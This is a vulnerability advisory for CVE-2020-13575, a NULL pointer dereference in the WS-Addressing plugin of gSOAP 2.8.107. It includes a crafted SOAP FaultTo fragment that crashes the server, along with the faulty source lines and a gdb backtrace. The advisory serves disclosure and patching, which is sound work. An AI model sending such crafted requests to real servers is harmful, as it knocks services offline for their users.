CVE-2020-13575
A denial-of-service vulnerability exists in the WS-Addressing plugin functionality of Genivia gSOAP 2.8.107. A specially crafted SOAP request can lead to denial of service. An attacker can send an HTTP request to trigger this vulnerability.
Genivia gSOAP 2.8.107
https://www.genivia.com/products.html#gsoap
7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE-476 - NULL Pointer Dereference
The gSOAP toolkit is a C/C++ library for developing XML-based web services. It includes several plugins to support the implementation of SOAP and web service standards. The framework also provides multiple deployment options including modules for both IIS and Apache, standalone CGI scripts and its own standalone HTTP service.
One of the many plugins provided by gSOAP includes the wsa plugin for supporting the WS-Addressing specification which provides an asynchronous mechanism for routing SOAP requests and responses. The specification includes a
A normal request
<wsa5:FaultTo SOAP-ENV:mustUnderstand="1">
<wsa5:Address></wsa5:Address> <---
<wsa5:ReferenceParameters>
<chan:ChannelInstance>0</chan:ChannelInstance>
</wsa5:ReferenceParameters>
<wsa5:Metadata>
</wsa5:Metadata>
</wsa5:FaultTo>
A malicious request
<wsa5:FaultTo SOAP-ENV:mustUnderstand="1">
<wsa5:ReferenceParameters>
<chan:ChannelInstance>0</chan:ChannelInstance>
</wsa5:ReferenceParameters>
<wsa5:Metadata>
</wsa5:Metadata>
</wsa5:FaultTo>
FaultTo->Address is set but never checked to be valid.
1055 if (oldheader->SOAP_WSA(FaultTo))
1056 oldheader->SOAP_WSA(FaultTo)->Address = oldheader->SOAP_WSA(ReplyTo)->Address;
1057 }
No check of oldheader->SOAP_WSA(FaultTo)->Address is ever made before being used.
1058 /* use FaultTo */
1059 if (oldheader && oldheader->SOAP_WSA(FaultTo) &&** !strcmp(oldheader->SOAP_WSA(FaultTo)->Address, soap_wsa_noneURI)) **
1060 return soap_send_empty_response(soap, SOAP_OK); /* HTTP ACCEPTED */
1061 soap->header = NULL;
(gdb) r 8080
Starting program: /gsoap-2.8-wsa/gsoap/samples/wsa/wsademo 8080
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Server is running
Program received signal SIGSEGV, Segmentation fault.
__strcmp_ssse3 () at ../sysdeps/x86_64/multiarch/../strcmp.S:173
173 ../sysdeps/x86_64/multiarch/../strcmp.S: No such file or directory.
(gdb) bt
#0 __strcmp_ssse3 () at ../sysdeps/x86_64/multiarch/../strcmp.S:173
#1 0x000055555556637a in soap_wsa_fault_subcode_action (soap=0x7ffff7fbe010, flag=1, faultsubcode=0x5555555a9739 "wsa5:ActionNotSupported",
faultstring=0x5555555a9c80 "The [action] cannot be processed at the receiver.", faultdetail=0x0, action=0x0) at ../../plugin/wsaapi.c:1060
#2 0x0000555555566257 in soap_wsa_fault_subcode (soap=0x7ffff7fbe010, flag=1, faultsubcode=0x5555555a9739 "wsa5:ActionNotSupported",
faultstring=0x5555555a9c80 "The [action] cannot be processed at the receiver.", faultdetail=0x0) at ../../plugin/wsaapi.c:1022
#3 0x00005555555666b1 in soap_wsa_sender_fault_subcode (soap=0x7ffff7fbe010, faultsubcode=0x5555555a9739 "wsa5:ActionNotSupported",
faultstring=0x5555555a9c80 "The [action] cannot be processed at the receiver.", faultdetail=0x0) at ../../plugin/wsaapi.c:1128
#4 0x0000555555566d5d in soap_wsa_error (soap=0x7ffff7fbe010, fault=wsa5__ActionNotSupported, info=0x0) at ../../plugin/wsaapi.c:1430
#5 0x000055555556709e in soap_wsa_set_error (soap=0x7ffff7fbe010, c=0x5555557bdbc0, s=0x5555557bdbc8) at ../../plugin/wsaapi.c:1625
#6 0x00005555555a61f4 in soap_set_fault (soap=0x7ffff7fbe010) at stdsoap2_ssl.c:22059
#7 0x00005555555a6f2a in soap_send_fault (soap=0x7ffff7fbe010) at stdsoap2_ssl.c:22322
#8 0x00005555555650cf in soap_serve (soap=0x7ffff7fbe010) at soapServer.c:42
#9 0x0000555555558d44 in main (argc=2, argv=0x7fffffffe4c8) at wsademo.c:85
2020-11-05 - Vendor Disclosure
2020-12-16 - Vendor advised patch released on 2020-11-20
2021-01-05 - Public Release
Discovered by a member of Cisco Talos.